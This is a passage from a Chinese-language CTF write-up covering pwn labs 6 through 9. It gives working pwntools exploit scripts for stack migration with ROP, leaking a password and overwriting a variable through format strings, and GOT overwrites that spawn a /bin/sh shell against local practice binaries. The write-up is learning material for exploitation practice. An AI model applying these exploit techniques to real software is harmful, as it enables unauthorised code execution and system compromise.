p32(mov_ineax)</span><br><span class="line">payload += p32(pop_eax) + p32(bss + 4)</span><br><span class="line">payload += p32(pop_edx) + binsh[4:8]</span><br><span class="line">payload += p32(mov_ineax)</span><br><span class="line">#构造 execve(&quot;/bin/sh\x00&quot;)函数并调用 </span><br><span class="line">payload += p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(bss)</span><br><span class="line">payload += p32(pop_eax) + p32(0x0b)</span><br><span class="line">#中断 ，进入系统调用 </span><br><span class="line">payload += p32(int0x80)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="lab6"><a href="#lab6" class="headerlink" title="lab6"></a>lab6</h2><p>从IDA我们可以看到，main函数只能调一次，那么就用不了ret2libc了，接下来算出溢出的空间只有20个字节（这里96是被我改过的，原题大小是0x40)</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-d7d69189fb316410.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>checksec：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-6a51e961975bba99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>溢出的空间是不够用来构造rop链的，那么就要用到栈迁移了，思路是：<br>先利用溢出执行一次read函数，把我们接下来要执行的rop链写到bss段去，利用leave将ebp跳转到bss段上去，让程序 当成栈去执行，从而达到栈迁移的目的<br>找到对应的gadget就可以开始写exp了<br>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./migration'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./migration'</span>)</span><br><span class="line"><span class="comment"># libc = ELF('/lib/i386-linux-gnu/libc.so.6')</span></span><br><span class="line">libc = elf.libc</span><br><span class="line">system_libc = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"system_libc :"</span> + hex(system_libc)</span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_plt :"</span> + hex(puts_plt)</span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_got :"</span> + hex(puts_got)</span><br><span class="line">puts_libc = libc.symbols[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_libc :"</span> + hex(puts_libc)</span><br><span class="line">read_plt = elf.plt[<span class="string">'read'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"read_plt :"</span> + hex(read_plt)</span><br><span class="line">binsh = libc.search(<span class="string">"/bin/sh"</span>).next()</span><br><span class="line"><span class="keyword">print</span> <span class="string">"binsh :"</span> + hex(binsh)</span><br><span class="line">leave_ret = <span class="number">0x08048418</span></span><br><span class="line">buf1 = elf.bss() + <span class="number">0x500</span></span><br><span class="line">buf2 = elf.bss() + <span class="number">0x400</span></span><br><span class="line"><span class="comment"># pop_ebp = 0x0804856b</span></span><br><span class="line">pop_ebx = <span class="number">0x0804836d</span></span><br><span class="line"><span class="comment">#调用 read 函数往 buf1 写入"/bin/sh"（不明白的一点，为什么第一个参数是0,第一个参数不该是指向"/bin/sh"的一个指针吗？）</span></span><br><span class="line"><span class="comment">#read的第一个参数为0指的是标准输入流也就是键盘，在脚本里面的键盘就是payload,也就是下一个senndline(payload)就是读入的内容 </span></span><br><span class="line">payload = <span class="string">"A"</span> * <span class="number">40</span></span><br><span class="line">payload += p32(buf1) + p32(read_plt) + p32(leave_ret) + p32(<span class="number">0</span>) + p32(buf1) + p32(<span class="number">0x100</span>)</span><br><span class="line">p.recvuntil(<span class="string">" :\n"</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">pause()</span><br><span class="line">p.send(payload)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line"><span class="comment">#打印出puts的真实地址 ，然后继续调用 read 函数</span></span><br><span class="line">payload = p32(buf2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret) + p32(<span class="number">0</span>) + p32(buf2) + p32(<span class="number">0x100</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line"><span class="comment">#接收打印的puts真实地址 </span></span><br><span class="line">puts_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_addr :"</span> + hex(puts_addr)</span><br><span class="line"><span class="comment">#算偏移</span></span><br><span class="line">offset = puts_addr - puts_libc</span><br><span class="line">system_addr = offset + system_libc</span><br><span class="line">binsh_addr = offset + binsh</span><br><span class="line">payload = p32(<span class="number">0</span>) + p32(system_addr) + <span class="string">"bbbb"</span> + p32(binsh_addr)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"><span class="comment"># 0xf7df9ca0</span></span><br></pre></td></tr></table></figure>
<p>这里盗来23R3F师傅的一张图来理解栈迁移的过程</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-4db63816d836c780.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<h2 id="lab7"><a href="#lab7" class="headerlink" title="lab7"></a>lab7</h2><p>先checksec一波，canary开了，不能愉快地栈溢出了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-499a4f330211bdf6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>这道题的意思很清楚，password是一个随机数，只要在第二次输入的时候相等那就可以cat 到 flag ，那么我们需要在第二次输入之前就知道password的值，这里我自然而然地想到了用gdb下断查看 password 的值，这种做法虽然在本地可以但是一但远程了就没鸟用；这就用到了格式化字符串<br>首先，我们要泄漏出password的值 ，要先得到格式化字符串的地址在哪，输入一串东西<code>&quot;“AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p........</code></p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-3c8d1984f1c1109d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>%p泄漏出了printf栈里面的东西，找到AAAA的位置，在第十个，也就是说，格式化字符串的栈的第十个位置，接下来我们就可以构造 <code>[地址] + %10$s</code>将password 泄漏出来，然后接下来就简单了。<br>exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">'./crack'</span>)</span><br><span class="line"><span class="comment">#输入"AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p...."可以爆出格化字符串的偏移为10</span></span><br><span class="line">password = <span class="number">0x804A048</span></span><br><span class="line"><span class="comment"># print p32(password)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">payload = p32(password) + <span class="string">"#"</span> + <span class="string">"%10$s"</span> + <span class="string">"#"</span> <span class="comment">#输入两个#用作标记</span></span><br><span class="line">p.recvuntil(<span class="string">"What your name ? "</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recvuntil(<span class="string">"#"</span>)    <span class="comment">#当接收到第一个#时开始返回password的内容了，接收</span></span><br><span class="line">r = p.recvuntil(<span class="string">"#"</span>)  <span class="comment">#接收到 # 结束</span></span><br><span class="line"><span class="comment"># print r</span></span><br><span class="line"><span class="keyword">print</span> len(r)</span><br><span class="line">pause()</span><br><span class="line"><span class="keyword">print</span> u32(r[:<span class="number">4</span>])    <span class="comment">#因为第二个#会被接收，所以要去掉</span></span><br><span class="line">a = u32(r[:<span class="number">4</span>])</span><br><span class="line"><span class="comment"># print str(a)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.recvuntil(<span class="string">"Your password :"</span>)</span><br><span class="line">p.send(str(a))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="lab8"><a href="#lab8" class="headerlink" title="lab8"></a>lab8</h2><p>拿到题目，先checksec一波</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-238ab53f4ae03dc0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>开了canary，跟栈溢出没关系了，放到IDA里很明显可以看到我们只需要修改magic的值为218或者0xFACEB00C就行了，再看这一句<code>printf(&amp;buf);</code>很明显是格式化字符串了。<br>先测试格式化字符串的位置：<br><img src="https://upload-images.jianshu.io/upload_images/12343640-90b814588bc8fd5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>偏移为7，接下来修改magic为218<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="comment">#偏移为7</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./craxme'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#改小</span></span><br><span class="line">magic = <span class="number">0x0804A038</span></span><br><span class="line">payload = <span class="string">""</span></span><br><span class="line">payload += p32(magic) + <span class="string">"%0214c"</span> + <span class="string">"%7$n"</span>     <span class="comment">#218-4 = 214，前面有个地址4位，所以只需再填214个字符</span></span><br><span class="line">payload2 = fmtstr_payload(<span class="number">7</span>,&#123;magic:<span class="number">218</span>&#125;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<p>修改magic为0xFACEB00C<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="comment">#偏移为7</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./craxme'</span>)</span><br><span class="line">magic = <span class="number">0x0804A038</span></span><br><span class="line">padding1 = <span class="number">0x10c</span><span class="number">-16</span>          <span class="comment">#因为0c-16&lt;0所以要在前面加一位(这个加了一位1),这样才能将0c读进去</span></span><br><span class="line">padding2 = <span class="number">0x1b0</span> - <span class="number">0x10c</span></span><br><span class="line">padding3 = <span class="number">0x1ce</span> - <span class="number">0x1b0</span></span><br><span class="line">padding4 = <span class="number">0x1fa</span> - <span class="number">0x1ce</span></span><br><span class="line"><span class="keyword">print</span> padding1</span><br><span class="line"><span class="keyword">print</span> padding2</span><br><span class="line"><span class="keyword">print</span> padding3</span><br><span class="line"><span class="keyword">print</span> padding4</span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">""</span></span><br><span class="line">payload += p32(magic) + p32(magic+<span class="number">1</span>) + p32(magic+<span class="number">2</span>) + p32(magic+<span class="number">3</span>)</span><br><span class="line"><span class="comment"># payload += padding1*'a' + "%7$n" + padding2*'b' + "%8$n" + padding3*'c' + "%9$n" + padding4*'d' + "%10$n"</span></span><br><span class="line">payload += <span class="string">"%252c%7$hhn"</span>  <span class="comment">#padding1    252+16 = 10c(以下同理)</span></span><br><span class="line">payload += <span class="string">"%164c%8$hhn"</span>  <span class="comment">#padding2</span></span><br><span class="line">payload += <span class="string">"%30c%9$hhn"</span>   <span class="comment">#padding3</span></span><br><span class="line">payload += <span class="string">"%44c%10$hhn"</span>  <span class="comment">#padding4</span></span><br><span class="line"><span class="comment"># payload2 = fmtstr_payload(7,&#123;magic:0xFACEB00C&#125;)   #也可以直接调用fmtstr_payload这个函数</span></span><br><span class="line">p.sendline(payload2)</span><br><span class="line"><span class="comment"># p.sendline(payload)</span></span><br><span class="line">p.recv()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<p>搜索大佬的博客发现还有另外 两种做法：<br>1、修改puts的got表为<code>system(&quot;cat /home/craxme/flag&quot;);</code>的地址，这样到执行<code>puts(&quot;You need be a phd&quot;);</code>时就会直接执行<code>system(&quot;cat /home/craxme/flag&quot;);</code><br>2、修改puts的got表为<code>read(0, &amp;buf, 0x100u);</code>把printf 的got表改为<code>system</code>的plt表地址，这样就能拿到shell了（我只能说骚啊）<br>1、修改puts的got表为<code>system(&quot;cat /home/craxme/flag&quot;);</code>的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*-coding:utf-8-*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">'./craxme'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./craxme'</span>)</span><br><span class="line"><span class="comment">#将put_got修改为read(0,&amp;buf,0x100)</span></span><br><span class="line"><span class="comment">#将printf修改为system</span></span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line">system_catflag = <span class="number">0x80485F3</span></span><br><span class="line"><span class="comment">#read(0,&amp;buf,0x100)</span></span><br><span class="line">read = <span class="number">0x80485A1</span></span><br><span class="line">payload = fmtstr_payload(<span class="number">7</span>,&#123;puts_got:system_catflag&#125;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>2、get shell<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*-coding:utf-8-*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">'./craxme'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./craxme'</span>)</span><br><span class="line"><span class="comment">#将put_got修改为read(0,&amp;buf,0x100)</span></span><br><span class="line"><span class="comment">#将printf修改为system</span></span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line">printf_got = elf.got[<span class="string">'printf'</span>]</span><br><span class="line">system_plt = elf.plt[<span class="string">'system'</span>]</span><br><span class="line"><span class="comment">#read(0,&amp;buf,0x100)</span></span><br><span class="line">read = <span class="number">0x80485A1</span></span><br><span class="line">payload = fmtstr_payload(<span class="number">7</span>,&#123;puts_got:read,printf_got:system_plt&#125;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.sendline(<span class="string">'/bin/sh\x00'</span>)   <span class="comment">#这一句可加可不加我也不清楚 为什么 </span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="lab9"><a href="#lab9" class="headerlink" title="lab9"></a>lab9</h2><p>格式化字符串漏洞，不过是有点蛇皮的格式化字符串，学到了不少新姿势</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-0eb9c0b2e4dee02e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>很明显的格式化字符串，但同时也可以发现，我们的输入是写到bss段去的，那就有一个问题了，我们要怎么利用格式化字符串修改got表为system函数的地址，因为这里我们要解决怎么把某个函数的got值放到栈里面去<br>先看一下栈中的情况</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-bae67728a9758224.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>可以发现输入放在bss段且固定在esp，但是也发现了几个有用的地址<code>ebp1,fmt7,ebp2,fmt11</code>，他们的格式化字符的偏移分别为6，7，10，11，我们还发现了<code>libc_start_main+247</code>这个真实地址，先泄漏出这个真实地址就可以得到偏移，进而算出其它函数的地址<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">06:0018│ ebp  0xffffcd48 —▸ 0xffffcd58 —▸ 0xffffcd68 ◂— 0x0</span><br><span class="line">07:001c│      0xffffcd4c —▸ 0x8048584 (play+59) ◂— nop    </span><br><span class="line">、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、</span><br><span class="line">0a:0028│      0xffffcd58 —▸ 0xffffcd68 ◂— 0x0</span><br><span class="line">0b:002c│      0xffffcd5c —▸ 0x80485b1 (main+42) ◂— nop</span><br></pre></td></tr></table></figure></p>
<p>我们可以看到ebp1是指向ebp2的指针，ebp2指向一个不知名的地址，这样我们就可以得到栈的地址，因此，如果我们使用%n对ebp1进行操作，那么实际上会修改ebp2的内容，所以，如果我们将ebp2修改为指向fmt7，那么就可以对ebp2进行%n操作来修改fmt7的内容，试想，把fmt7的内容修改为printf_got，这样就实现了把got值放到栈里面去了，接下来就可能通过偏移来进行修改，但是又有另一个问题，一次只能修改2个字节，而需要修改的有4 个字节，又因为我们本来就是利用 printf 函数实现修改的，所以只能一次性修改4个字节（如果修改的不是printf函数，因为有个while循环，可以回到再利用printf函数进行第二次修改）。所以我们可以把要修改的高2 个字节放到fmt11去，同时修改两个位置，这样就可以了，那么思路就出来了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1、先泄漏出libc_start_main的地址，算出偏移</span><br><span class="line">2、利用偏移得到system等函数的地址</span><br><span class="line">3、泄漏出栈地址</span><br><span class="line">4、利用ebp1指向ebp2的关系修改ebp2指向fmt7，进而修改fmt7为printf_got，修改ebp2指向fmt11，进而修改fmt11为printf_got+2</span><br><span class="line">5、修改fmt7和fmt11内容为system的地址</span><br><span class="line">6、发送&apos;/bin/sh&apos;做为system 的参数执行那可</span><br></pre></td></tr></table></figure></p>
<p>exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*-coding:utf-8-*-</span></span><br><span class="line"><span class="comment">#libc_start_main+247在偏移15处</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./playfmt'</span>)</span><br><span class="line"><span class="comment"># /lib/i386-linux-gnu/libc-2.23.so</span></span><br><span class="line">elf = ELF(<span class="string">'./playfmt'</span>)</span><br><span class="line">libc = elf.libc </span><br><span class="line">p.recv()</span><br><span class="line"><span class="comment">#泄漏 libc_start_main 的地址 </span></span><br><span class="line">p.sendline(<span class="string">'%15$p'</span>)</span><br><span class="line">libc_start_main = int(p.recv(),<span class="number">16</span>)<span class="number">-247</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'libc_start_main--&gt;'</span> + hex(libc_start_main)</span><br><span class="line"><span class="comment"># libc_start_main 的libc地址 </span></span><br><span class="line">libc_start_main_libc = libc.symbols[<span class="string">'__libc_start_main'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'libc_start_main_libc--&gt;'</span> + hex(libc_start_main_libc)</span><br><span class="line">offset = libc_start_main - libc_start_main_libc</span><br><span class="line"><span class="keyword">print</span> <span class="string">'offset--&gt;'</span> + hex(offset)</span><br><span class="line">system_addr = offset + libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'system_addr--&gt;'</span> + hex(system_addr)</span><br><span class="line">printf_addr = offset + libc.symbols[<span class="string">'printf'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'printf_addr--&gt;'</span> + hex(printf_addr)  </span><br><span class="line">printf_got = elf.got[<span class="string">'printf'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'printf_got--&gt;'</span> + hex(printf_got)</span><br><span class="line"><span class="comment"># one_gadget = 0x3ac5c + offset</span></span><br><span class="line"><span class="comment"># print 'one_gadget--&gt;' + hex(one_gadget)</span></span><br><span class="line"><span class="comment"># 修改 printf_got 为 system_addr</span></span><br><span class="line"><span class="comment"># 泄漏 ebp </span></span><br><span class="line">p.sendline(<span class="string">'%6$p'</span>)</span><br><span class="line">ebp2 = int(p.recv(),<span class="number">16</span>) <span class="comment">#10</span></span><br><span class="line">ebp1 = ebp2<span class="number">-0x10</span> <span class="comment">#6</span></span><br><span class="line">fmt7 = ebp1+<span class="number">0x4</span></span><br><span class="line">fmt11 = ebp2+<span class="number">0x4</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'ebp1--&gt;'</span> + hex(ebp1)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'ebp2--&gt;'</span> + hex(ebp2)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'fmt7--&gt;'</span> + hex(fmt7)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'fmt11--&gt;'</span> + hex(fmt11)</span><br><span class="line">pause()</span><br><span class="line"><span class="comment"># 先将 ebp2 指向fmt7</span></span><br><span class="line"><span class="comment"># gdb.attach(p,"b *0x0804853B")</span></span><br><span class="line">p.sendline(<span class="string">'%'</span>+str(fmt7&amp;<span class="number">0xffff</span>)+<span class="string">'c%6$hn'</span>)</span><br><span class="line">p.recv()</span><br><span class="line"><span class="comment"># 再将 fmt7 修改为print_got</span></span><br><span class="line">p.sendline(<span class="string">'%'</span>+str(printf_got&amp;<span class="number">0xffff</span>)+<span class="string">'c%10$hn'</span>)</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	p.send(<span class="string">"n0va"</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	data = p.recv()</span><br><span class="line">	<span class="keyword">if</span> data.find(<span class="string">"n0va"</span>) != <span class="number">-1</span>:</span><br><span class="line">		<span class="keyword">break</span></span><br><span class="line"><span class="comment"># 现在要将 fmt11 修改为print_got+2</span></span><br><span class="line"><span class="comment"># 先将 ebp2 指向fmt11</span></span><br><span class="line">p.sendline(<span class="string">'%'</span>+str(fmt11&amp;<span class="number">0xffff</span>)+<span class="string">'c%6$hn'</span>)</span><br><span class="line">p.recv()</span><br><span class="line"><span class="comment">#再将 fmt11 修改为printf_got+2(即printf_got的高4位现在在printf_got+2的低4位的位置)</span></span><br><span class="line">p.sendline(<span class="string">'%'</span>+str((printf_got+<span class="number">2</span>)&amp;<span class="number">0xffff</span>)+<span class="string">'c%10$hn'</span>)</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	p.send(<span class="string">"n0va"</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	data = p.recv()</span><br><span class="line">	<span class="keyword">if</span> data.find(<span class="string">"n0va"</span>) != <span class="number">-1</span>:</span><br><span class="line">		<span class="keyword">break</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">这个循环用于保证所有的字节都被输出，因为recv（）一次最多只能接收0x1000</span></span><br><span class="line"><span class="string">个字节，所以要进行多次recv（）才能保证全部字节都输出以便进行下面的操作</span></span><br><span class="line"><span class="string">需要注意的是，要构造一个字符串“n0va”来作标志，返回的大量字符串中如果</span></span><br><span class="line"><span class="string">包含了这个字符串那么说明之前构造的%n写入已经完成</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="comment"># --------到这里fmt7放着printf_got(即printf_addr),fmt11放着printf_got+2(即printf_addr的高4位移到了低4位的位置)</span></span><br><span class="line"><span class="comment"># 修改printf_got 为sytem_addr	 (要同时修改fmt7为print_addr的低4位，fmt11为printf_addr的高4位)</span></span><br><span class="line"><span class="comment"># 修改printf_got 的低4位</span></span><br><span class="line">payload = <span class="string">'%'</span>+str((system_addr&amp;<span class="number">0xffff</span>)<span class="number">-12</span>)+<span class="string">'c%7$hn'</span>     <span class="comment">#在调试时发现，在'%...c'之前有3个'n0va'所以要-12才能保证正确定入</span></span><br><span class="line"><span class="comment"># 修改printf_got 的高4位</span></span><br><span class="line">payload += <span class="string">'%'</span>+str((system_addr&gt;&gt;<span class="number">16</span>)-(system_addr&amp;<span class="number">0xffff</span>))+<span class="string">'c%11$hn'</span></span><br><span class="line">gdb.attach(p,<span class="string">"b *0x0804853B"</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	p.send(<span class="string">"n0va"</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	data = p.recv()</span><br><span 